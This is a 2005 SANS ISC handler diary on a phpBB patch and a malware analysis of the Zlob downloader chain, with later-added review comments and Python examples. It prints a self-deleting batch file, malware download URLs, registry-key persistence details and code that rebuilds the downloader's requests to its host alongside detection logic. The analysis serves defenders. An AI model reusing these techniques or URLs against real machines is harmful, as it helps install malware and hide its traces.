
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-20



Google Strangeness: Is It New?; Filthy Minkey; New phpBB; FTBM VII: Afterglow

Published: 2005-07-20
Last Updated: 2005-07-21 17:09:42 UTC
by Tom Liston (Version: 1)

Google Strangeness: Is It New?


While the consensus (our consensus... Google isn't talkin') is that Google is probably using the redirects through their site as a ranking device, there is a whole lotta' division about whether this behavior represents anything new. We're still looking into the situation.



I was talking to the Gypsy and his filthy minkey...


If you use the GreaseMonkey extension for Mozilla-based browsers, current wisdom is to disable the chimp until a fix for the remote file-reading vulnerability is released. More info is available at the GreaseMonkey site:



http://greasemonkey.mozdev.org/


phpBB 2.0.17 released


This release fixes several cross-site scripting (XSS) issues and adds some new functionality.



URLs:

Announcement:

- http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=308490

Tutorial for heavily modded boards:

- http://www.phpbb.com/phpBB/viewtopic.php?t=308426

Downloads:

- http://www.phpbb.com/downloads.php



Fellow Handler Swa Frantzen sent me a play-by-play of the upgrade:



1. Make backup
# cp -r <forum> <backup>

2. Make sure the backup is offline (it contains the vulnerable code)
# chmod 0 <backup>

3. Patch the files

Patching or copying of the replacement files.
Modded boards need to do this very carefully.

admin/admin_ug_auth.php
- the pending list for groups.

admin/admin_users.php
- escaping of the username

includes/bbcode.php
- the XSS issue:
less liberal acceptance of exotic chars in URLs
will break I18N domain names (might not be that bad after all)
[Funny, I remember this code being changed in 2.0.16 as well]
Still, it seems to match now, e.g.:
#\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]#is
which still allows a lot to match to something of the format of
[url=xxxx://www.phpbb.com]phpBB[/url]

includes/functions.php
- unclear, my knowledge of php & their code is lacking

diff:
9c9
< * $Id: functions.php,v 1.133.2.35 2005/07/19 20:01:11 acydburn Exp $
---
> * $Id: functions.php,v 1.133.2.34 2005/02/21 18:37:33 acydburn Exp $
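Review bot: The version stamps in this first hunk show the diff was taken as `diff <new> <old>`: the `<` side is functions.php 1.133.2.35 (2005/07/19, the 2.0.17 file) and the `>` side is 1.133.2.34 (2005/02/21), so in the hunks below the `<` lines are the fixed code and the `>` lines are what they replace; feeding it to patch needs -R or the two files swapped.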

120c120
< if (!is_numeric($user) || $force_str)
---
> if (intval($user) == 0 || $force_str)
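Review bot: `!is_numeric($user)` is tighter than `intval($user) == 0` but not a clean ID-versus-name test: is_numeric() accepts leading whitespace, a sign, decimals and exponent forms (" 12", "+5", "1e3"), and on PHP 5 also hex strings such as "0x1A", so whatever passes here should still be cast with (int) before it is put into the user_id lookup. The old test had the opposite weakness, coercing a username that merely starts with digits ("123abc") to user ID 123; a username made only of digits is ambiguous under both versions, which is what $force_str is for.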

581c581
< define('HAS_DIED', 1);
---
> define(HAS_DIED, 1);
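Review bot: Quoting the name in define('HAS_DIED', 1) fixes a real bug, not a style nit: the bare HAS_DIED on the `>` side is read as an undefined constant, which PHP turns into the string 'HAS_DIED' (with an E_NOTICE under E_ALL), so the old line only worked by accident, and later PHP versions treat an undefined constant as an error rather than a notice.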

includes/functions_validate.php
- call the clean function instead of the
username length limit (25 chars) and escaping of single quotes.

includes/usercp_activate.php
- add test to see if the admin is doing the activation when needed

includes/usercp_viewprofile.php
- adding username in the search functionality of the
viewprofile control panel

privmsg.php
- big changes in handling of deletion of messages it seems

templates/subSilver/faq_body.tpl
- change a href from "#Top" to "#top"
Doing this properly would require making this change in ALL
installed templates, not just in subSilver. If you changed or
added templates this can be hard.

viewtopic.php
- adding username in the search functionality

4. copy script (kills board)
# cp -r <src dir>/contrib <forum>
# cp -r <src dir>/install <forum>

5. run database update script
http://<site>/<forum>/install/update_to_latest.php

6. remove script
# rm -r <forum>/contrib
# rm -r <forum>/install

7. test and get back in business.
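To see what the bbcode.php pattern Swa quotes actually accepts and rejects, here is an added example (mine, not phpBB code and not part of Swa's notes) that runs the same pattern in Python against a few constructed [url=...] tags. The PCRE pattern is carried over to Python's re module with re.ASCII so that \w means [A-Za-z0-9_], as it does in PCRE without the /u modifier; SAFE_URL_RE is an assumed hardened variant that pins the scheme to an allow-list, not a change phpBB made.

```python
"""Exercise the [url=...] pattern quoted above from phpBB 2.0.17's includes/bbcode.php.

Added example, not phpBB code. The PCRE pattern is carried over to Python's re
module with re.ASCII so that \\w means [A-Za-z0-9_], as it does in PCRE without
the /u modifier. SAFE_URL_RE is an assumed hardened variant, not a phpBB change.
"""
import re

# The diary's pattern with the PHP '#...#is' delimiters removed; the 'i' and 's'
# modifiers become re.IGNORECASE and re.DOTALL.
PHPBB_URL_RE = re.compile(
    r"\[url=([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]",
    re.IGNORECASE | re.DOTALL | re.ASCII,
)

# Assumed hardening: the original lets the scheme be any \w+ (Swa's "xxxx://"),
# so pin it to an allow-list and leave the rest of the pattern alone.
SAFE_URL_RE = re.compile(
    r"\[url=((?:https?|ftp)://[\w\#$%&~/.\-;:=,?@\[\]+]*?)\]([^?\n\r\t].*?)\[/url\]",
    re.IGNORECASE | re.DOTALL | re.ASCII,
)


def extract_url(bbcode, pattern=PHPBB_URL_RE):
    """Return the URL the pattern would turn into an href, or None if it does not match."""
    m = pattern.search(bbcode)
    return m.group(1) if m else None


# Constructed inputs: Swa's two examples plus an IDN host and an injected '<'.
SAMPLES = [
    "[url=http://www.phpbb.com]phpBB[/url]",
    "[url=xxxx://www.phpbb.com]phpBB[/url]",
    "[url=http://bücher.example/]Umlaut host[/url]",
    "[url=http://www.phpbb.com/<b>]angle bracket[/url]",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:55} 2.0.17: {extract_url(s)!r:32} allow-list: {extract_url(s, SAFE_URL_RE)!r}")
```

Running it shows both halves of Swa's remark: the 2.0.17 class rejects the umlaut host (the I18N breakage) and the `<` (the tightening that matters for XSS), yet still passes `xxxx://www.phpbb.com` because the scheme is only constrained to word characters; the allow-listed variant is what closes that.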


Follow the Bouncing Malware VII: Afterglow



Disclaimer:



Let's face it: not everyone is smart. There are some people in this world that can best be described as being all foam, and no beer. They are the reason for those little stickers on your hair dryer reminding you that using electrical appliances while bathing is a bad idea. ('Scuse me... You there... the one who said "It is?"... Go home. Now.) The following is for *those* people:



If, during the course of this malware tour de force, I happen to mention a website address, DO NOT GO TO THAT SITE.



Yes, *I* go to these sites. But if you read these rantings of mine closely, you'll discover something else: I'm somewhat crazy. I'm also ten foot tall and bullet-proof. And I floss.



Daily.



If, despite this warning, you visit one of the sites I discuss and get infected, please write in to tell me. I can always use a good laugh.

The story thus far:



(The Reader's Digest version is below, or you can read the full thing in FTBM VI.)



Joe Sixpack, the protagonist of this little stream o' consciousness, went looking on the 'Net for some "entertainment" in the form of video clips of folks repeatedly attempting procreation and other, various, athletically-challenging "events." Needless to say (but I'm saying it anyway... go figure), he found it. But, just like the Space Shuttle, when Joe was all...ahem... ready for launch, he got grounded: according to the "smorgasbord o' smut" website that he had found, he needed to load something called a "codec" onto his computer for the movin' pictures to... well... move.



Traipsing over to www.vcodec.com, Joe found just the thing: a file called "vc3_05.exe" which promised to make even the poorly lit, unevenly edited, cheesy dialogue and cheap background music of a low budget porn flick into a work of digital art.



Not one to let anything stand between him and (as the Supremes like to put it) stuff "without redeeming social importance" (and no, I wasn't talking about the ladies who sang with Diana Ross...), Joe installed that sucker lickity-split. (Note to Puritans who like to write complaint emails: That phrase only *sounds* dirty... really...)



As it turned out, however, Joe (who really *is* all foam/no beer), had actually infected himself with what is now identified as Win32.TrojanDownloader.Zlob.G, a chunk of "Yes, Master..." malware that took its marching orders from a command file downloaded from fhgstr.com. The command file directed it to download nine (count 'em nine...) more programs for Joe (gifts!). In today's installment (titled "Afterglow"), we'll track what happens to Joe's computer as it's gettin' the same thing the folks in Joe's movie are gettin'...



Notes/Feedback from FTBM VI:



1) Yes, I know I spelled eulogize wrong. It was a joke. It was a pun. A EULA is an End User... oh, never mind...



2) There is pornography on the Internet. It's no use complaining to me about it. I didn't put it there and, to the best of my knowledge, don't appear in any photos or videos.



3) Personally, I thought I handled the subject with my usual grace and dignity (i.e. none :-). For those of you who disagree, perhaps the problem is with your interpretation. I quote from one of the unsung geniuses of modern parody music:




Old books can be indecent books,
Though recent books are bolder.
For filth, I'm glad to say,
Is in the mind of the beholder.
When correctly viewed,
Everything is lewd...
--Tom Lehrer, "Smut"


4) No one out there recognized that the section names in FTBM VI were taken from the old-fashioned title cards in the movie "The Sting." I'm very disappointed in all of you.

Afterglow:



While Joe is... uh... keeping busy, so is his computer. At the behest of the fine folks running fhgstr.com, Joe's computer sends out nine HTTP GET requests, which it formulates from this data, downloaded in a request to "info.php" on fhgstr.com:

6e
M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so|HP7081700.so|P7091300.so|S7081700.so
0



These nine GET requests look like this:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1
User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038
Host: fhgstr.com
Cache-Control: no-cache



and, in fact, this downloads the first file, M7081700.so.
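As an added example (mine, not the malware's code), the following reproduces the step between the info.php reply and the nine GETs, and adds the detection a practitioner would want alongside it. The reply is reconstructed from the listing above; its "6e" and trailing "0" framing reads as HTTP/1.1 chunked transfer-coding (0x6e = 110 bytes, which is the 109-character list plus a newline). Host, path and land=1033 come from the captured request; the User-Agent is assumed to be the two wrapped lines joined, and the filename shape in DOWNLOADER_RE is generalised from the nine names shown.

```python
"""Reconstruct how the Zlob downloader turns the fhgstr.com info.php reply into
its nine downloadex.php requests, and flag such requests in a capture.

Added example, not the malware's own code. INFO_PHP_BODY is constructed from the
listing in the diary: the leading '6e' and trailing '0' are HTTP/1.1 chunked
transfer-coding (0x6e = 110 bytes = the 109-character list plus a newline).
Host, path and land=1033 come from the captured request; the User-Agent is
assumed to be the two wrapped lines joined; the filename shape in DOWNLOADER_RE
is generalised from the nine names shown.
"""
import re

INFO_PHP_BODY = (
    b"6e\r\n"
    b"M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so"
    b"|HP7081700.so|P7091300.so|S7081700.so\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
)

USER_AGENT = ("029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192="
              "3-12-0jd0912093712-4917b-2c0812308b1c2038")


def decode_chunked(body):
    """Minimal HTTP/1.1 chunked decoder: hex size, data, CRLF, repeated until a 0 chunk."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def parse_command_file(body=INFO_PHP_BODY):
    """Return the '|'-separated list of files the downloader is told to fetch."""
    payload = decode_chunked(body).decode("ascii").strip()
    return [name for name in payload.split("|") if name]


def build_request(filename, host="fhgstr.com", land=1033):
    """Format one GET the way the captured request looks."""
    return (f"GET /downloadex.php?file={filename}&land={land} HTTP/1.1\r\n"
            f"User-Agent: {USER_AGENT}\r\n"
            f"Host: {host}\r\n"
            f"Cache-Control: no-cache\r\n"
            f"\r\n")


def build_all_requests(body=INFO_PHP_BODY):
    """All nine requests, in the order the command file lists them."""
    return [build_request(name) for name in parse_command_file(body)]


# Detection side: the request-line shape, independent of the exact hostname,
# so it still fires if the operators move the script to another domain.
DOWNLOADER_RE = re.compile(
    r"^GET /downloadex\.php\?file=[A-Z]{1,2}\d{7}\.so&land=\d+ HTTP/1\.[01]\r?$",
    re.MULTILINE,
)


def flag_downloader_requests(http_text):
    """Return every request line in a proxy/IDS text capture matching the downloader's pattern."""
    return [m.group(0).rstrip("\r") for m in DOWNLOADER_RE.finditer(http_text)]


if __name__ == "__main__":
    for req in build_all_requests():
        print(req.split("\r\n")[0])
```

The decoder is deliberately strict about the CRLF after each chunk: a command file that does not decode cleanly is worth a second look rather than a silent best-effort split. The fixed, nonsensical User-Agent is the other obvious signature; it is left out of DOWNLOADER_RE only because a string that odd is trivial for the operators to change.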



M7081700.so is a 7,588-byte executable that is, once again, packed with FSG. When it is launched, it copies itself to:



Windows\System32\msole32.exe



and creates two registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run

and populates the "run" key with a value named "winlogon.exe" whose data actually points to "msole32.exe". Two things worth noting for anyone hunting this: the Policies\Explorer\Run key is a Group Policy autostart location that Explorer processes at logon, so it gets far less attention than the usual CurrentVersion\Run key, and the value name borrows the name of a legitimate Windows component so that it looks innocuous in a listing.
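As an added example (mine, not from the diary), here is how that persistence would surface in an analyst's tooling: a check over a Registry Editor export that flags autostart values whose name borrows an executable's name but whose data launches a different file. The .reg text is constructed to mirror the description above; the full path C:\WINDOWS\System32\msole32.exe and the set of autostart keys examined are assumptions.

```python
"""Flag autostart values whose name borrows a system binary's name (winlogon.exe)
but whose data launches something else (msole32.exe), as described above.

Added example, not from the diary or the malware. SAMPLE_REG is constructed in
Registry Editor export format to mirror the page's description; the full path
C:\\WINDOWS\\System32\\msole32.exe is assumed, as is the set of autostart keys.
"""
import ntpath
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run]
"winlogon.exe"="C:\\WINDOWS\\System32\\msole32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="\"C:\\Program Files\\Example\\updater.exe\" /quiet"
'''

# Autostart locations processed at logon (the same paths exist under HKCU).
AUTOSTART_KEYS = (
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
)

KEY_RE = re.compile(r"^\[(?P<hive>[^\\\]]+)\\(?P<path>[^\]]+)\]\s*$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"\s*$')


def parse_reg(text):
    """Yield (key_path, value_name, value_data) for REG_SZ values in a .reg export."""
    key = None
    for line in text.splitlines():
        m = KEY_RE.match(line)
        if m:
            key = m.group("path")
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            # .reg escapes '\' as '\\' and '"' as '\"' (simplified unescape)
            data = m.group("data").replace('\\"', '"').replace("\\\\", "\\")
            yield key, m.group("name"), data


def command_executable(data):
    """Basename of the program a command-line value launches ("C:\\x\\a.exe" /q -> a.exe)."""
    data = data.strip()
    if data.startswith('"'):
        program = data[1:].split('"', 1)[0]
    else:
        program = data.split()[0] if data else ""
    return ntpath.basename(program)


def find_masquerading_autostarts(reg_text):
    """Return (key, value_name, launched_exe) where the name is *.exe but the data runs a different file."""
    hits = []
    for key, name, data in parse_reg(reg_text):
        if not any(key.lower().endswith(k.lower()) for k in AUTOSTART_KEYS):
            continue
        if not name.lower().endswith(".exe"):
            continue
        exe = command_executable(data)
        if exe.lower() != name.lower():
            hits.append((key, name, exe))
    return hits


if __name__ == "__main__":
    for key, name, exe in find_masquerading_autostarts(SAMPLE_REG):
        print(f"{key}: value '{name}' launches '{exe}'")
```

The name-versus-target comparison is only the narrowest check; in practice a value called winlogon.exe under any Run key is suspect on its own, since the real winlogon is started by the system and never from an autostart entry, and the same scan should be run over the HKCU hive of every profile on the box.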



Now that it has set itself up to be auto-launched at restart, it hangs in the background waiting for... well... something. I'm not really sure what triggers it, but eventually, it pops up a caution triangle containing an exclamation point in the systray, and fires up one of those cute little WinXP "notification balloon" thingies with one of several possible warnings:



Critical System Error!
Please read this message carefully.
Your PC is infected by spyware.
You must improve your PC security and system perfomance by deleting
spyware from your operating system.
Click the icon to remove spyware.

Attention! Failure to delete spyware from your PC can reslut in damage
of system resources and your personal files corruption.
Use special software to remove spyware and adware from your computer.
Click "OK" to get all available Anti Spyware software.

System Warning! 4 Errors found:
-Your computer has slowed down
-Your Internet connection speed has decreased
-You get popups and annoying ads when you're online or sometimes even offline
-Your default home page has been changed to the one you didn't ask for
Click "OK" to download spyware scan and delete infected files.

System perfomance notice.
Perfomance of your system is extremely low.
The main reason is adware popups. To improve perfomance of your PC you
have to remove or block popup's source from operating system.
Please, use special software to remove adware materials from your computer.
Click "OK" to get full list of available "PopUp Blocking" software.

Critical System Error!
Please read this message carefully.
System detected virus activities. They may cause critical system
failure. Please,use antivirus software to clean and protect your
system from viruses and parasite programs.
Click "OK" to get all available software.

System Alert: Spyware Detected
System has detected 4 active spyware applications that may cause frequent
application crashes, instability or low
computer perfomance.
Click the icon to remove spyware.

System Alert: Popups
Your PC is infected with popups adware (OHPE ver 4.12_23).
Click the icon to get all available anti popup software.
Click the icon to remove spyware.

Security Alert!
System encountered spyware that gathers your private information without
your consent. This information includes passwords, credit card details
and other private data.

Urgent System Message: Virus!
Your computer was infected with last version of internet
worm (iworm_attck_v122.02a). It is highly recommended that you install
antivirus software.
Click the icon for more information.

System Alert: Adware & Spyware
Your computer has slowed down. Your Internet connection speed has decreased.
You receive more spam emails than ever. Use Spyware scan to find
out the reason
Click the icon to remove spyware.


Dang! Isn't that amazing? That software KNEW that Joe's PC was infected with spyware and yet in my analysis, I never saw any code that would indicate that it scanned his computer at all. Hmmm.... how could it know that?



"I am malware, therefore, you are infected"



(With sincere apologies to Rene Descartes)



Clicking on "the icon" takes you to various sub-pages of www.securityindex.net, where some fine folks who write with the same stilted grammar exhibited above, will be glad to sell you Adware Delete Cleaner (which actually, to me, sounds like it removes adware deletion software...), AntivirusGold, or Spyware Sheriff (with the optional Deputy Trojan plug-in module ;-).



And just in case you were wondering, I *always* purchase my anti-malware programs from ads that pop up on my screen...



'Nuff said.



The next piece o' malware on today's hit parade is K7111600.so, a 4,611-byte executable that (for once!) isn't packed or obfuscated in any way.



Cracking this one open reveals a couple of interesting strings:



http:/ez-finder.com/avg.exe
http:/ez-finder.com/dd.exe
SOFTWARE\AntivirusGold
COMSPEC

@echo off
:start
echo > %1
del %1
if exist %1 goto start
del %0



(note: the links have been slightly altered)

Seems that AntivirusGold is a popular product among malware authors...



The second half of those strings is actually a small DOS batch file that attempts to delete a particular file, the name of which is passed as a command-line parameter (%1). If the delete fails, it simply loops back around and tries again. Once the deletion succeeds, it deletes itself (%0). The COMSPEC string sitting next to it suggests the batch file is written to disk and handed to the command interpreter at run time.

This is a means used by malware authors to cover their tracks and delete their files when they complete their nefarious deeds. As you know (or perhaps you didn't), on Windows an executing file cannot be deleted: its image is memory-mapped by the operating system and held open, so the del fails for as long as the process is alive. A looping batch file like this just keeps trying; the moment the main program exits, the delete succeeds, the batch file removes itself, and the whole shootin' match disappears. (The trick is Windows-specific. On Unix-like systems a running executable can be unlinked immediately; the inode just lingers until the last reference to it goes away.)



What else does the main program do? Well, in this case, it downloads AntivirusGold ("avg.exe") and something called "dd.exe" from the fine folks at ez-finder.com:



avg.exe: 2,663,231 bytes

dd.exe: 36,864 bytes



I'll take a closer look at these two in a future FTBM, but for now, let's move on to another of the "gifts" being installed while Joe is... er... otherwise occupied.



DA7021900.so is 4,099 bytes of downloadin' goodness that retrieves the provocatively named "X.exe", a 14,848-byte executable, from either 48.dapfeed.com or 773.dapfeed.com. The interesting thing here is that X.exe is only about 10K larger than the DA7021900.so downloader that fetches it... so what is the advantage of using the downloader? Obviously, the extra hop lets the malware folks swap in another file for X.exe whenever they like, but at the time of writing, this ain't the brightest move they've made.



X.exe turns out to be a "dialer" program, software that modifies your dial-up connection settings so that your Internet connection is made through a 1-900-BIG-BUCKS per minute provider. Specifically, this one dials 1-900-444-0307.



So... what's the score-card look like so far? While Joe is watching his movie, he's been treated with the installation of nine pieces of software, three of which we've examined in detail:



M7081700.so - 7,588 bytes
K7111600.so - 4,611 bytes
DA7021900.so - 4,099 bytes
X7081700.so - 2,716 bytes
Z7121900.so - 2,600 bytes
A6291400.so - 34,819 bytes
HP7081700.so - 39,396 bytes
P7091300.so - 21,088 bytes
S7081700.so - 18,036 bytes



The programs that we investigated today installed:



avg.exe - 2,663,231 bytes
dd.exe - 36,864 bytes
X.exe - 14,848 bytes



Joe's dial up connection has been whacked, and so the next time he dials out, he'll be paying phone-sex, per-minute pricing for his 'Net connection.



But he did get AntivirusGold installed on his machine for free. So how bad could it all be?



Just wait......



-------------------------------------------------------------------------

Handler on Duty: Tom Liston ( http://www.intelguardians.com )